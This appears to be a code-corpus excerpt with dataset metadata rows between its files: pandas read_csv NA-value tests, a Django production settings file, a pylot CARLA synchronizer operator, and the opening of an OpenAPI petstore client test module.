NA,baz
NaN,nan
"""
expected = DataFrame(
[["foo", "bar"], [np.nan, "baz"], [np.nan, np.nan]], columns=["A", "B"]
)
result = parser.read_csv(StringIO(data))
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"na_values",
[
["-999.0", "-999"],
[-999, -999.0],
[-999.0, -999],
["-999.0"],
["-999"],
[-999.0],
[-999],
],
)
@pytest.mark.parametrize(
"data",
[
"""A,B
-999,1.2
2,-999
3,4.5
""",
"""A,B
-999,1.200
2,-999.000
3,4.500
""",
],
)
def test_non_string_na_values(all_parsers, data, na_values):
# see gh-3611: with an odd float format, we can't match
# the string "999.0" exactly but still need float matching
parser = all_parsers
expected = DataFrame([[np.nan, 1.2], [2.0, np.nan], [3.0, 4.5]], columns=["A", "B"])
result = parser.read_csv(StringIO(data), na_values=na_values)
tm.assert_frame_equal(result, expected)
def test_default_na_values(all_parsers):
_NA_VALUES = {
"-1.#IND",
"1.#QNAN",
"1.#IND",
"-1.#QNAN",
"#N/A",
"N/A",
"n/a",
"NA",
"<NA>",
"#NA",
"NULL",
"null",
"NaN",
"nan",
"-NaN",
"-nan",
"#N/A N/A",
"",
}
assert _NA_VALUES == STR_NA_VALUES
parser = all_parsers
nv = len(_NA_VALUES)
def f(i, v):
if i == 0:
buf = ""
elif i > 0:
buf = "".join([","] * i)
buf = f"{buf}{v}"
if i < nv - 1:
joined = "".join([","] * (nv - i - 1))
buf = f"{buf}{joined}"
return buf
data = StringIO("\n".join(f(i, v) for i, v in enumerate(_NA_VALUES)))
expected = DataFrame(np.nan, columns=range(nv), index=range(nv))
result = parser.read_csv(data, header=None)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize("na_values", ["baz", ["baz"]])
def test_custom_na_values(all_parsers, na_values):
parser = all_parsers
data = """A,B,C
ignore,this,row
1,NA,3
-1.#IND,5,baz
7,8,NaN
"""
expected = DataFrame(
[[1.0, np.nan, 3], [np.nan, 5, np.nan], [7, 8, np.nan]], columns=["A", "B", "C"]
)
result = parser.read_csv(StringIO(data), na_values=na_values, skiprows=[1])
tm.assert_frame_equal(result, expected)
def test_bool_na_values(all_parsers):
data = """A,B,C
True,False,True
NA,True,False
False,NA,True"""
parser = all_parsers
result = parser.read_csv(StringIO(data))
expected = DataFrame(
{
"A": np.array([True, np.nan, False], dtype=object),
"B": np.array([False, True, np.nan], dtype=object),
"C": [True, False, True],
}
)
tm.assert_frame_equal(result, expected)
def test_na_value_dict(all_parsers):
data = """A,B,C
foo,bar,NA
bar,foo,foo
foo,bar,NA
bar,foo,foo"""
parser = all_parsers
df = parser.read_csv(StringIO(data), na_values={"A": ["foo"], "B": ["bar"]})
expected = DataFrame(
{
"A": [np.nan, "bar", np.nan, "bar"],
"B": [np.nan, "foo", np.nan, "foo"],
"C": [np.nan, "foo", np.nan, "foo"],
}
)
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize(
"index_col,expected",
[
(
[0],
DataFrame({"b": [np.nan], "c": [1], "d": [5]}, index=Index([0], name="a")),
),
(
[0, 2],
DataFrame(
{"b": [np.nan], "d": [5]},
index=MultiIndex.from_tuples([(0, 1)], names=["a", "c"]),
),
),
(
["a", "c"],
DataFrame(
{"b": [np.nan], "d": [5]},
index=MultiIndex.from_tuples([(0, 1)], names=["a", "c"]),
),
),
],
)
def test_na_value_dict_multi_index(all_parsers, index_col, expected):
data = """\
a,b,c,d
0,NA,1,5
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), na_values=set(), index_col=index_col)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"kwargs,expected",
[
(
dict(),
DataFrame(
{
"A": ["a", "b", np.nan, "d", "e", np.nan, "g"],
"B": [1, 2, 3, 4, 5, 6, 7],
"C": ["one", "two", "three", np.nan, "five", np.nan, "seven"],
}
),
),
(
dict(na_values={"A": [], "C": []}, keep_default_na=False),
DataFrame(
{
"A": ["a", "b", "", "d", "e", "nan", "g"],
"B": [1, 2, 3, 4, 5, 6, 7],
"C": ["one", "two", "three", "nan", "five", "", "seven"],
}
),
),
(
dict(na_values=["a"], keep_default_na=False),
DataFrame(
{
"A": [np.nan, "b", "", "d", "e", "nan", "g"],
"B": [1, 2, 3, 4, 5, 6, 7],
"C": ["one", "two", "three", "nan", "five", "", "seven"],
}
),
),
(
dict(na_values={"A": [], "C": []}),
DataFrame(
{
"A": ["a", "b", np.nan, "d", "e", np.nan, "g"],
"B": [1, 2, 3, 4, 5, 6, 7],
"C": ["one", "two", "three", np.nan, "five", np.nan, "seven"],
}
),
),
],
)
def test_na_values_keep_default(all_parsers, kwargs, expected):
data = """\
A,B,C
a,1,one
b,2,two
,3,three
d,4,nan
e,5,five
nan,6,
g,7,seven
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), **kwargs)
tm.assert_frame_equal(result, expected)
def test_no_na_values_no_keep_default(all_parsers):
# see gh-4318: passing na_values=None and
# keep_default_na=False yields 'None" as a na_value
data = """\
A,B,C
a,1,None
b,2,two
,3,None
d,4,nan
e,5,five
nan,6,
g,7,seven
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), keep_default_na=False)
expected = DataFrame(
{
"A": ["a", "b", "", "d", "e", "nan", "g"],
"B": [1, 2, 3, 4, 5, 6, 7],
"C": ["None", "two", "None", "nan", "five", "", "seven"],
}
)
tm.assert_frame_equal(result, expected)
def test_no_keep_default_na_dict_na_values(all_parsers):
# see gh-19227
data = "a,b\n,2"
parser = all_parsers
result = parser.read_csv(
StringIO(data), na_values={"b": ["2"]}, keep_default_na=False
)
expected = DataFrame({"a": [""], "b": [np.nan]})
tm.assert_frame_equal(result, expected)
def test_no_keep_default_na_dict_na_scalar_values(all_parsers):
# see gh-19227
#
# Scalar values shouldn't cause the parsing to crash or fail.
data = "a,b\n1,2"
parser = all_parsers
df = parser.read_csv(StringIO(data), na_values={"b": 2}, keep_default_na=False)
expected = DataFrame({"a": [1], "b": [np.nan]})
tm.assert_frame_equal(df, expected)
@pytest.mark.parametrize("col_zero_na_values", [113125, "113125"])
def test_no_keep_default_na_dict_na_values_diff_reprs(all_parsers, col_zero_na_values):
# see gh-19227
data = """\
113125,"blah","/blaha",kjsdkj,412.166,225.874,214.008
729639,"qwer","",asdfkj,466.681,,252.373
"""
parser = all_parsers
expected = DataFrame(
{
0: [np.nan, 729639.0],
1: [np.nan, "qwer"],
2: ["/blaha", np.nan],
3: ["kjsdkj", "asdfkj"],
4: [412.166, 466.681],
5: ["225.874", ""],
6: [np.nan, 252.373],
}
)
result = parser.read_csv(
StringIO(data),
header=None,
keep_default_na=False,
na_values={2: "", 6: "214.008", 1: "blah", 0: col_zero_na_values},
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"na_filter,row_data",
[
(True, [[1, "A"], [np.nan, np.nan], [3, "C"]]),
(False, [["1", "A"], ["nan", "B"], ["3", "C"]]),
],
)
def test_na_values_na_filter_override(all_parsers, na_filter, row_data):
data = """\
A,B
1,A
nan,B
3,C
"""
parser = all_parsers
result = parser.read_csv(StringIO(data), na_values=["B"], na_filter=na_filter)
expected = DataFrame(row_data, columns=["A", "B"])
tm.assert_frame_equal(result, expected)
def test_na_trailing_columns(all_parsers):
parser = all_parsers
data = """Date,Currency,Symbol,Type,Units,UnitPrice,Cost,Tax
2012-03-14,USD,AAPL,BUY,1000
2012-05-12,USD,SBUX,SELL,500"""
# Trailing columns should be all NaN.
result = parser.read_csv(StringIO(data))
expected = DataFrame(
[
["2012-03-14", "USD", "AAPL", "BUY", 1000, np.nan, np.nan, np.nan],
["2012-05-12", "USD", "SBUX", "SELL", 500, np.nan, np.nan, np.nan],
],
columns=[
"Date",
"Currency",
"Symbol",
"Type",
"Units",
"UnitPrice",
"Cost",
"Tax",
],
)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"na_values,row_data",
[
(1, [[np.nan, 2.0], [2.0, np.nan]]),
({"a": 2, "b": 1}, [[1.0, 2.0], [np.nan, np.nan]]),
],
)
def test_na_values_scalar(all_parsers, na_values, row_data):
# see gh-12224
parser = all_parsers
names = ["a", "b"]
data = "1,2\n2,1"
result = parser.read_csv(StringIO(data), names=names, na_values=na_values)
expected = DataFrame(row_data, columns=names)
tm.assert_frame_equal(result, expected)
def test_na_values_dict_aliasing(all_parsers):
parser = all_parsers
na_values = {"a": 2, "b": 1}
na_values_copy = na_values.copy()
names = ["a", "b"]
data = "1,2\n2,1"
expected = DataFrame([[1.0, 2.0], [np.nan, np.nan]], columns=names)
result = parser.read_csv(StringIO(data), names=names, na_values=na_values)
tm.assert_frame_equal(result, expected)
tm.assert_dict_equal(na_values, na_values_copy)
def test_na_values_dict_col_index(all_parsers):
# see gh-14203
data = "a\nfoo\n1"
parser = all_parsers
na_values = {0: "foo"}
result = parser.read_csv(StringIO(data), na_values=na_values)
expected = DataFrame({"a": [np.nan, 1]})
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"data,kwargs,expected",
[
(
str(2 ** 63) + "\n" + str(2 ** 63 + 1),
dict(na_values=[2 ** 63]),
DataFrame([str(2 ** 63), str(2 ** 63 + 1)]),
),
(str(2 ** 63) + ",1" + "\n,2", dict(), DataFrame([[str(2 ** 63), 1], ["", 2]])),
(str(2 ** 63) + "\n1", dict(na_values=[2 ** 63]), DataFrame([np.nan, 1])),
],
)
def test_na_values_uint64(all_parsers, data, kwargs, expected):
# see gh-14983
parser = all_parsers
result = parser.read_csv(StringIO(data), header=None, **kwargs)
tm.assert_frame_equal(result, expected)
def test_empty_na_values_no_default_with_index(all_parsers):
# see gh-15835
data = "a,1\nb,2"
parser = all_parsers
expected = DataFrame({"1": [2]}, index=Index(["b"], name="a"))
result = parser.read_csv(StringIO(data), index_col=0, keep_default_na=False)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"na_filter,index_data", [(False, ["", "5"]), (True, [np.nan, 5.0])]
)
def test_no_na_filter_on_index(all_parsers, na_filter, index_data):
# see gh-5239
#
# Don't parse NA-values in index unless na_filter=True
parser = all_parsers
data = "a,b,c\n1,,3\n4,5,6"
expected = DataFrame({"a": [1, 4], "c": [3, 6]}, index=Index(index_data, name="b"))
result = parser.read_csv(StringIO(data), index_col=[1], na_filter=na_filter)
tm.assert_frame_equal(result, expected)
def test_inf_na_values_with_int_index(all_parsers):
# see gh-17128
parser = all_parsers
data = "idx,col1,col2\n1,3,4\n2,inf,-inf"
# Don't fail with OverflowError with inf's and integer index column.
out = parser.read_csv(StringIO(data), index_col=[0], na_values=["inf", "-inf"])
expected = DataFrame(
{"col1": [3, np.nan], "col2": [4, np.nan]}, index=Index([1, 2], name="idx")
)
tm.assert_frame_equal(out, expected)
@pytest.mark.parametrize("na_filter", [True, False])
def test_na_values_with_dtype_str_and_na_filter(all_parsers, na_filter):
# see gh-20377
parser = all_parsers
data = "a,b,c\n1,,3\n4,5,6"
# na_filter=True --> missing value becomes NaN.
# na_filter=False --> missing value remains empty string.
empty = np.nan if na_filter else ""
expected = DataFrame({"a": ["1", "4"], "b": [empty, "5"], "c": ["3", "6"]})
result = parser.read_csv(StringIO(data), na_filter=na_filter, dtype=str)
tm.assert_frame_equal(result, expected)
@pytest.mark.parametrize(
"data, na_values",
[
("false,1\n,1\ntrue", None),
("false,1\nnull,1\ntrue", None),
("false,1\nnan,1\ntrue", None),
("false,1\nfoo,1\ntrue", "foo"),
("false,1\nfoo,1\ntrue", ["foo"]),
("false,1\nfoo,1\ntrue", {"a": "foo"}),
],
)
def test_cast_NA_to_bool_raises_error(all_parsers, data, na_values):
parser = all_parsers
msg = (
"(Bool column has NA values in column [0a])|"
"(cannot safely convert passed user dtype of "
"bool for object dtyped data in column 0)"
)
with pytest.raises(ValueError, match=msg):
parser.read_csv(
StringIO(data),
header=None,
names=["a", "b"],
dtype={"a": "bool"},
na_values=na_values,
)
def test_str_nan_dropped(all_parsers):
# see gh-21131
parser = all_parsers
data = """File: small.csv,,
10010010233,0123,654
foo,,bar
01001000155,4530,898"""
result = parser.read_csv(
StringIO(data),
header=None,
names=["col1", "col2", "col3"],
dtype={"col1": str, "col2": str, "col3": str},
).dropna()
expected = DataFrame(
{
"col1": ["10010010233", "01001000155"],
"col2": ["0123", "4530"],
"col3": ["654", "898"],
},
index=[1, 3],
)
tm.assert_frame_equal(result, expected)
| 27.504394
| 89
| 0.518211
|
19e9d3a1f9d6e759c4f79a442f626df1c7df3a75
| 8,864
|
py
|
Python
|
config/settings/production.py
|
NumanIbnMazid/Django_Skeleton_Default
|
4ab147cc91145533f1acc8c364360575e08ca5c8
|
[
"MIT"
] | null | null | null |
config/settings/production.py
|
NumanIbnMazid/Django_Skeleton_Default
|
4ab147cc91145533f1acc8c364360575e08ca5c8
|
[
"MIT"
] | 16
|
2022-01-21T14:40:31.000Z
|
2022-03-31T14:27:25.000Z
|
config/settings/production.py
|
NumanIbnMazid/Django_Skeleton_Default
|
4ab147cc91145533f1acc8c364360575e08ca5c8
|
[
"MIT"
] | null | null | null |
import logging
import sentry_sdk
from sentry_sdk.integrations.celery import CeleryIntegration
from sentry_sdk.integrations.django import DjangoIntegration
from sentry_sdk.integrations.logging import LoggingIntegration
from sentry_sdk.integrations.redis import RedisIntegration
from .base import * # noqa
from .base import env
# GENERAL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
SECRET_KEY = env("DJANGO_SECRET_KEY")
# https://docs.djangoproject.com/en/dev/ref/settings/#allowed-hosts
ALLOWED_HOSTS = env.list("DJANGO_ALLOWED_HOSTS", default=["example.com"])
# DATABASES
# ------------------------------------------------------------------------------
DATABASES["default"] = env.db("DATABASE_URL") # noqa F405
DATABASES["default"]["ATOMIC_REQUESTS"] = True # noqa F405
DATABASES["default"]["CONN_MAX_AGE"] = env.int("CONN_MAX_AGE", default=60) # noqa F405
# CACHES
# ------------------------------------------------------------------------------
CACHES = {
"default": {
"BACKEND": "django_redis.cache.RedisCache",
"LOCATION": env("REDIS_URL"),
"OPTIONS": {
"CLIENT_CLASS": "django_redis.client.DefaultClient",
# Mimicing memcache behavior.
# https://github.com/jazzband/django-redis#memcached-exceptions-behavior
"IGNORE_EXCEPTIONS": True,
},
}
}
# SECURITY
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-proxy-ssl-header
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-ssl-redirect
SECURE_SSL_REDIRECT = env.bool("DJANGO_SECURE_SSL_REDIRECT", default=True)
# https://docs.djangoproject.com/en/dev/ref/settings/#session-cookie-secure
SESSION_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/ref/settings/#csrf-cookie-secure
CSRF_COOKIE_SECURE = True
# https://docs.djangoproject.com/en/dev/topics/security/#ssl-https
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-seconds
# TODO: set this to 60 seconds first and then to 518400 once you prove the former works
SECURE_HSTS_SECONDS = 60
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-include-subdomains
SECURE_HSTS_INCLUDE_SUBDOMAINS = env.bool(
"DJANGO_SECURE_HSTS_INCLUDE_SUBDOMAINS", default=True
)
# https://docs.djangoproject.com/en/dev/ref/settings/#secure-hsts-preload
SECURE_HSTS_PRELOAD = env.bool("DJANGO_SECURE_HSTS_PRELOAD", default=True)
# https://docs.djangoproject.com/en/dev/ref/middleware/#x-content-type-options-nosniff
SECURE_CONTENT_TYPE_NOSNIFF = env.bool(
"DJANGO_SECURE_CONTENT_TYPE_NOSNIFF", default=True
)
# STORAGES
# ------------------------------------------------------------------------------
# https://django-storages.readthedocs.io/en/latest/#installation
INSTALLED_APPS += ["storages"] # noqa F405
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_ACCESS_KEY_ID = env("DJANGO_AWS_ACCESS_KEY_ID")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_SECRET_ACCESS_KEY = env("DJANGO_AWS_SECRET_ACCESS_KEY")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_STORAGE_BUCKET_NAME = env("DJANGO_AWS_STORAGE_BUCKET_NAME")
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_QUERYSTRING_AUTH = False
# DO NOT change these unless you know what you're doing.
_AWS_EXPIRY = 60 * 60 * 24 * 7
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_OBJECT_PARAMETERS = {
"CacheControl": f"max-age={_AWS_EXPIRY}, s-maxage={_AWS_EXPIRY}, must-revalidate"
}
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#settings
AWS_S3_REGION_NAME = env("DJANGO_AWS_S3_REGION_NAME", default=None)
# https://django-storages.readthedocs.io/en/latest/backends/amazon-S3.html#cloudfront
AWS_S3_CUSTOM_DOMAIN = env("DJANGO_AWS_S3_CUSTOM_DOMAIN", default=None)
aws_s3_domain = AWS_S3_CUSTOM_DOMAIN or f"{AWS_STORAGE_BUCKET_NAME}.s3.amazonaws.com"
# STATIC
# ------------------------
STATICFILES_STORAGE = "whitenoise.storage.CompressedManifestStaticFilesStorage"
# MEDIA
# ------------------------------------------------------------------------------
DEFAULT_FILE_STORAGE = "django_skeleton_default.utils.storages.MediaRootS3Boto3Storage"
MEDIA_URL = f"https://{aws_s3_domain}/media/"
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#default-from-email
DEFAULT_FROM_EMAIL = env(
"DJANGO_DEFAULT_FROM_EMAIL",
default="Django Skeleton Default <noreply@example.com>",
)
# https://docs.djangoproject.com/en/dev/ref/settings/#server-email
SERVER_EMAIL = env("DJANGO_SERVER_EMAIL", default=DEFAULT_FROM_EMAIL)
# https://docs.djangoproject.com/en/dev/ref/settings/#email-subject-prefix
EMAIL_SUBJECT_PREFIX = env(
"DJANGO_EMAIL_SUBJECT_PREFIX",
default="[Django Skeleton Default]",
)
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL regex.
ADMIN_URL = env("DJANGO_ADMIN_URL")
# Anymail
# ------------------------------------------------------------------------------
# https://anymail.readthedocs.io/en/stable/installation/#installing-anymail
INSTALLED_APPS += ["anymail"] # noqa F405
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
# https://anymail.readthedocs.io/en/stable/installation/#anymail-settings-reference
# https://anymail.readthedocs.io/en/stable/esps/mailgun/
EMAIL_BACKEND = "anymail.backends.mailgun.EmailBackend"
ANYMAIL = {
"MAILGUN_API_KEY": env("MAILGUN_API_KEY"),
"MAILGUN_SENDER_DOMAIN": env("MAILGUN_DOMAIN"),
"MAILGUN_API_URL": env("MAILGUN_API_URL", default="https://api.mailgun.net/v3"),
}
# django-compressor
# ------------------------------------------------------------------------------
# https://django-compressor.readthedocs.io/en/latest/settings/#django.conf.settings.COMPRESS_ENABLED
COMPRESS_ENABLED = env.bool("COMPRESS_ENABLED", default=True)
# https://django-compressor.readthedocs.io/en/latest/settings/#django.conf.settings.COMPRESS_URL
COMPRESS_URL = STATIC_URL # noqa F405
# https://django-compressor.readthedocs.io/en/latest/settings/#django.conf.settings.COMPRESS_OFFLINE
COMPRESS_OFFLINE = True # Offline compression is required when using Whitenoise
# https://django-compressor.readthedocs.io/en/latest/settings/#django.conf.settings.COMPRESS_FILTERS
COMPRESS_FILTERS = {
"css": [
"compressor.filters.css_default.CssAbsoluteFilter",
"compressor.filters.cssmin.rCSSMinFilter",
],
"js": ["compressor.filters.jsmin.JSMinFilter"],
}
# LOGGING
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#logging
# See https://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
"version": 1,
"disable_existing_loggers": True,
"formatters": {
"verbose": {
"format": "%(levelname)s %(asctime)s %(module)s "
"%(process)d %(thread)d %(message)s"
}
},
"handlers": {
"console": {
"level": "DEBUG",
"class": "logging.StreamHandler",
"formatter": "verbose",
}
},
"root": {"level": "INFO", "handlers": ["console"]},
"loggers": {
"django.db.backends": {
"level": "ERROR",
"handlers": ["console"],
"propagate": False,
},
# Errors logged by the SDK itself
"sentry_sdk": {"level": "ERROR", "handlers": ["console"], "propagate": False},
"django.security.DisallowedHost": {
"level": "ERROR",
"handlers": ["console"],
"propagate": False,
},
},
}
# Sentry
# ------------------------------------------------------------------------------
SENTRY_DSN = env("SENTRY_DSN")
SENTRY_LOG_LEVEL = env.int("DJANGO_SENTRY_LOG_LEVEL", logging.INFO)
sentry_logging = LoggingIntegration(
level=SENTRY_LOG_LEVEL, # Capture info and above as breadcrumbs
event_level=logging.ERROR, # Send errors as events
)
integrations = [
sentry_logging,
DjangoIntegration(),
CeleryIntegration(),
RedisIntegration(),
]
sentry_sdk.init(
dsn=SENTRY_DSN,
integrations=integrations,
environment=env("SENTRY_ENVIRONMENT", default="production"),
traces_sample_rate=env.float("SENTRY_TRACES_SAMPLE_RATE", default=0.0),
)
# Your stuff...
# ------------------------------------------------------------------------------
| 42.209524
| 100
| 0.645645
|
6e80902352bfbda435e0751d46f7c89ef34f6fcd
| 3,215
|
py
|
Python
|
pylot/simulation/synchronizer_operator.py
|
seikurou/pylot
|
0e47c3dcaf6f0d4a3937b94846d2e55ef908dfa5
|
[
"Apache-2.0"
] | null | null | null |
pylot/simulation/synchronizer_operator.py
|
seikurou/pylot
|
0e47c3dcaf6f0d4a3937b94846d2e55ef908dfa5
|
[
"Apache-2.0"
] | null | null | null |
pylot/simulation/synchronizer_operator.py
|
seikurou/pylot
|
0e47c3dcaf6f0d4a3937b94846d2e55ef908dfa5
|
[
"Apache-2.0"
] | null | null | null |
import erdos
from erdos import ReadStream, Timestamp, WriteStream
from pylot.control.messages import ControlMessage
from pylot.simulation.utils import get_vehicle_handle, get_world, \
set_simulation_mode
class SynchronizerOperator(erdos.Operator):
"""Sends control messages when it receives a watermark on a stream.
The operator can be used to ensure that simulator does not tick before the
slowest stream in a data-flow completes processing a timestmap.
Warning:
The operator should only be used with the CARLA auto pilot enabled.
Args:
wait_stream (:py:class:`erdos.ReadStream`): The stream on which to wait
for watermark messages.
control_stream (:py:class:`erdos.WriteStream`): Stream on which control
messages are published.
flags (absl.flags): Object to be used to access absl flags.
"""
def __init__(self, ground_vehicle_id_stream: ReadStream,
wait_stream: ReadStream, control_stream: WriteStream, flags):
erdos.add_watermark_callback([wait_stream], [control_stream],
self.on_watermark)
self._logger = erdos.utils.setup_logging(self.config.name,
self.config.log_file_name)
self._vehicle_id_stream = ground_vehicle_id_stream
self._vehicle = None
self._flags = flags
@staticmethod
def connect(ground_vehicle_id_stream: ReadStream, wait_stream: ReadStream):
control_stream = erdos.WriteStream()
return [control_stream]
def run(self):
# Read the vehicle ID from the vehicle ID stream.
vehicle_id_msg = self._vehicle_id_stream.read()
vehicle_id = vehicle_id_msg.data
# Connect to the world. We connect here instead of in the constructor
# to ensure we're connected to the latest world.
_, world = get_world(self._flags.carla_host, self._flags.carla_port,
self._flags.carla_timeout)
set_simulation_mode(world, self._flags)
self._vehicle = get_vehicle_handle(world, vehicle_id)
def on_watermark(self, timestamp: Timestamp, control_stream: WriteStream):
"""Invoked when the input stream has received a watermark.
The method sends a control message.
Args:
timestamp (:py:class:`erdos.timestamp.Timestamp`): The timestamp of
the watermark.
"""
self._logger.debug('@{}: received watermark'.format(timestamp))
# The control message is ignored by the bridge operator because
# data gathering is conducted using auto pilot.
# Send the control that the vehicle is currently applying.
vehicle_control = self._vehicle.get_control()
control_msg = ControlMessage(vehicle_control.steer,
vehicle_control.throttle,
vehicle_control.brake,
vehicle_control.hand_brake,
vehicle_control.reverse, timestamp)
control_stream.send(control_msg)
control_stream.send(erdos.WatermarkMessage(timestamp))
| 43.445946
| 79
| 0.65381
|
5e1dd8528c9c055522ecd220139310c1728e55c3
| 14,023
|
py
|
Python
|
samples/client/petstore/python-experimental/tests/test_pet_api.py
|
malymato/openapi-generator
|
47e2c0d027d867de67633bbc9c0a5d7e1054a778
|
[
"Apache-2.0"
] | 2
|
2019-12-08T12:00:11.000Z
|
2022-01-02T13:47:52.000Z
|
samples/client/petstore/python-experimental/tests/test_pet_api.py
|
malymato/openapi-generator
|
47e2c0d027d867de67633bbc9c0a5d7e1054a778
|
[
"Apache-2.0"
] | 8
|
2021-03-01T21:18:19.000Z
|
2022-02-27T07:56:15.000Z
|
samples/client/petstore/python-experimental/tests/test_pet_api.py
|
malymato/openapi-generator
|
47e2c0d027d867de67633bbc9c0a5d7e1054a778
|
[
"Apache-2.0"
] | 1
|
2019-11-26T06:36:44.000Z
|
2019-11-26T06:36:44.000Z
|
# coding: utf-8
# flake8: noqa
"""
Run the tests.
$ docker pull swaggerapi/petstore
$ docker run -d -e SWAGGER_HOST=http://petstore.swagger.io -e SWAGGER_BASE_PATH=/v2 -p 80:8080 swaggerapi/petstore
$ pip install nose (optional)
$ cd petstore_api-python
$ nosetests -v
"""
from collections import namedtuple
import json
import os
import unittest
import petstore_api
from petstore_api import Configuration
from petstore_api.rest import (
RESTClientObject,
RESTResponse
)
import six
from petstore_api.exceptions import (
ApiException,
ApiValueError,
ApiTypeError,
)
from .util import id_gen
import urllib3
if six.PY3:
from unittest.mock import patch
else:
from mock import patch
HOST = 'http://localhost/v2'
class TimeoutWithEqual(urllib3.Timeout):
def __init__(self, *arg, **kwargs):
super(TimeoutWithEqual, self).__init__(*arg, **kwargs)
def __eq__(self, other):
return self._read == other._read and self._connect == other._connect and self.total == other.total
class MockPoolManager(object):
def __init__(self, tc):
self._tc = tc
self._reqs = []
def expect_request(self, *args, **kwargs):
self._reqs.append((args, kwargs))
def request(self, *args, **kwargs):
self._tc.assertTrue(len(self._reqs) > 0)
r = self._reqs.pop(0)
self._tc.maxDiff = None
self._tc.assertEqual(r[0], args)
self._tc.assertEqual(r[1], kwargs)
return urllib3.HTTPResponse(status=200, body=b'test')
class PetApiTests(unittest.TestCase):
def setUp(self):
config = Configuration()
config.host = HOST
self.api_client = petstore_api.ApiClient(config)
self.pet_api = petstore_api.PetApi(self.api_client)
self.setUpModels()
self.setUpFiles()
def setUpModels(self):
self.category = petstore_api.Category()
self.category.id = id_gen()
self.category.name = "dog"
self.tag = petstore_api.Tag()
self.tag.id = id_gen()
self.tag.name = "python-pet-tag"
self.pet = petstore_api.Pet(name="hello kity", photo_urls=["http://foo.bar.com/1", "http://foo.bar.com/2"])
self.pet.id = id_gen()
self.pet.status = "sold"
self.pet.category = self.category
self.pet.tags = [self.tag]
def setUpFiles(self):
self.test_file_dir = os.path.join(os.path.dirname(__file__), "..", "testfiles")
self.test_file_dir = os.path.realpath(self.test_file_dir)
def test_preload_content_flag(self):
self.pet_api.add_pet(self.pet)
resp = self.pet_api.find_pets_by_status(status=[self.pet.status], _preload_content=False)
# return response should at least have read and close methods.
self.assertTrue(hasattr(resp, 'read'))
self.assertTrue(hasattr(resp, 'close'))
# Also we need to make sure we can release the connection to a pool (if exists) when we are done with it.
self.assertTrue(hasattr(resp, 'release_conn'))
# Right now, the client returns urllib3.HTTPResponse. If that changed in future, it is probably a breaking
# change, however supporting above methods should be enough for most usecases. Remove this test case if
# we followed the breaking change procedure for python client (e.g. increasing major version).
self.assertTrue(resp.__class__, 'urllib3.response.HTTPResponse')
resp.close()
resp.release_conn()
def test_timeout(self):
mock_pool = MockPoolManager(self)
self.api_client.rest_client.pool_manager = mock_pool
mock_pool.expect_request('POST', 'http://localhost/v2/pet',
body=json.dumps(self.api_client.sanitize_for_serialization(self.pet)),
headers={'Content-Type': 'application/json',
'Authorization': 'Bearer ',
'User-Agent': 'OpenAPI-Generator/1.0.0/python'},
preload_content=True, timeout=TimeoutWithEqual(total=5))
mock_pool.expect_request('POST', 'http://localhost/v2/pet',
body=json.dumps(self.api_client.sanitize_for_serialization(self.pet)),
headers={'Content-Type': 'application/json',
'Authorization': 'Bearer ',
'User-Agent': 'OpenAPI-Generator/1.0.0/python'},
preload_content=True, timeout=TimeoutWithEqual(connect=1, read=2))
self.pet_api.add_pet(self.pet, _request_timeout=5)
self.pet_api.add_pet(self.pet, _request_timeout=(1, 2))
def test_separate_default_client_instances(self):
pet_api = petstore_api.PetApi()
pet_api2 = petstore_api.PetApi()
self.assertNotEqual(pet_api.api_client, pet_api2.api_client)
pet_api.api_client.user_agent = 'api client 3'
pet_api2.api_client.user_agent = 'api client 4'
self.assertNotEqual(pet_api.api_client.user_agent, pet_api2.api_client.user_agent)
def test_separate_default_config_instances(self):
pet_api = petstore_api.PetApi()
pet_api2 = petstore_api.PetApi()
self.assertNotEqual(pet_api.api_client.configuration, pet_api2.api_client.configuration)
pet_api.api_client.configuration.host = 'somehost'
pet_api2.api_client.configuration.host = 'someotherhost'
self.assertNotEqual(pet_api.api_client.configuration.host, pet_api2.api_client.configuration.host)
def test_async_request(self):
thread = self.pet_api.add_pet(self.pet, async_req=True)
response = thread.get()
self.assertIsNone(response)
thread = self.pet_api.get_pet_by_id(self.pet.id, async_req=True)
result = thread.get()
self.assertIsInstance(result, petstore_api.Pet)
def test_async_with_result(self):
self.pet_api.add_pet(self.pet, async_req=False)
thread = self.pet_api.get_pet_by_id(self.pet.id, async_req=True)
thread2 = self.pet_api.get_pet_by_id(self.pet.id, async_req=True)
response = thread.get()
response2 = thread2.get()
self.assertEquals(response.id, self.pet.id)
self.assertIsNotNone(response2.id, self.pet.id)
def test_async_with_http_info(self):
self.pet_api.add_pet(self.pet)
thread = self.pet_api.get_pet_by_id(self.pet.id, async_req=True,
_return_http_data_only=False)
data, status, headers = thread.get()
self.assertIsInstance(data, petstore_api.Pet)
